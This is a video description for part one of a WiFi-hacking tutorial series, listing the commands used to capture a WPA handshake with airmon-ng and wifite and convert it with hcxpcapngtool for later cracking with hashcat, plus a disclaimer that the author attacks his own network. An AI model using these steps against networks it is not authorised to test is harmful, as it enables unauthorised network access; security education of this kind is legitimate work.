How to Hack WiFi? (Part 1 of 3) Urdu | Hindi

Опубликовано: 06 Март 2023
на канале: Hack0x90
248
2

In this video series I will demonstrate how to hack a WiFi network.

In part1, I will capture the WiFi's handshake.
In Part2, I will generate a custom word list to crack the handshake captured in part1.
In part3, I will use hashcat to crack the handshake using the word list generated in part1 to get the WiFi password.

// ----------------- Command Used in the Video -----------------

1. Kill all processes and services interfering with the handshake capture process.
sudo airmon-ng check kill

2. List all USB devices
lsusb

3. List all wireless cards
iwconfig

4. Start Wifite
sudo wifite

5. Convert .cap file to .hc22000 format
sudo hcxpcapngtool -o hakMe.hc22000 handshake_file.cap

Disclaimer:
I have setup my own WiFi just for this video, so I am hacking my own WiFi and I think I have not violated any YouTube community guidelines. Purpose of this video is purely educational. Hacking techniques shown in this video is to inform people about how easy it is to hack a WiFi network, if they do not use strong password.